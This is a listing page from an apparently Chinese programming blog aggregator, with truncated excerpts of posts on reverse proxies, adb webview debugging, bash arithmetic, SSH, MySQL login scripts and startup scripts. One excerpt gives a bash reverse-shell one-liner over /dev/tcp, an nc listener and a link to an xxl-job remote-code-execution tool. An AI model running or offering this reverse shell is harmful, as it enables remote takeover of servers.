不太会用,自己记录一下,不定时更改错误 一、设置反向代理-> 把端口映射出来 环境: A : 192.168.230.128(自己的机器) B:192.168.230.129 ← > ip2: 192.168.82.128 C: 192.168.82.129 A 可以ping 通B B可以ping ...
分类:
其他好文 时间:
2020-12-03 12:22:12
阅读次数:
4
打开webview页面 chrome://inspect/#devices 获取webview driver版本 1、 2、 3、 chenshifengdeMacBook-Pro:ChromeDriver chenshifeng$ adb shell pm list package|grep we ...
分类:
移动开发 时间:
2020-12-03 12:17:50
阅读次数:
10
bash shell 的内置命令 let 可以进行整型数的数学运算。 #! /bin/bash … … let c=a+b … … ...
分类:
其他好文 时间:
2020-12-03 11:29:06
阅读次数:
4
Linux系统SSH(SecureShellProtocol)服务Linux系统SSH(SecureShellProtocol)服务一:什么是SSH服务在数据传输前,SSH会对需要传输的数据进行加密,保证会话安全与会话中传输数据的安全,SSH客户端还包括一个远程拷贝命令scp二:SSH的结构SSH服务由服务端软件(openssh)和客户端(SSH、SecureCRT、Xshell)组成,SSH默认
分类:
系统相关 时间:
2020-12-02 12:42:55
阅读次数:
14
bash -i >& /dev/tcp/ip/port 0>&1 服务器监听 nc -lvvp 9999 利用工具 https://github.com/mrknow001/xxl-job-rce bash反弹shell命令 https://www.cnblogs.com/supdon/p/1346 ...
1 !/bin/bash 2 3 4 HOSTNAME="localhost" 5 PORT="3306" 6 USERNAME="root" 7 PASSWORD="1234" 8 DBNAME="mydatabase" 9 10 11 LOGIN_CMD="mysql -h${HOSTNAME} ...
分类:
数据库 时间:
2020-12-02 12:27:59
阅读次数:
12
shell是弱类型语言如何查看linux支持哪些shell:cat/etc/shells
分类:
系统相关 时间:
2020-12-02 11:57:06
阅读次数:
7
code macname@localhost Desktop % cat content fox jumps over the lazy dog. fox jumps over the lazy dog. fox jumps over the lazy dog. fox jumps over the ...
分类:
系统相关 时间:
2020-12-01 12:32:52
阅读次数:
24
1.打开shell终端,输入 sudo vi /etc/rc.local 2.在编辑器里面输入自己要启动的脚本 #!/bin/bash echo "run incar ai program..." cd /opt/robot nohup bash autorobot.sh & 2>/dev/null ...
分类:
系统相关 时间:
2020-12-01 12:15:17
阅读次数:
12
code macname@localhost Desktop % cat test.sh while read line;do echo $line; done < a.txt macname@localhost Desktop % macname@localhost Desktop % cat a ...
分类:
系统相关 时间:
2020-11-30 16:14:46
阅读次数:
16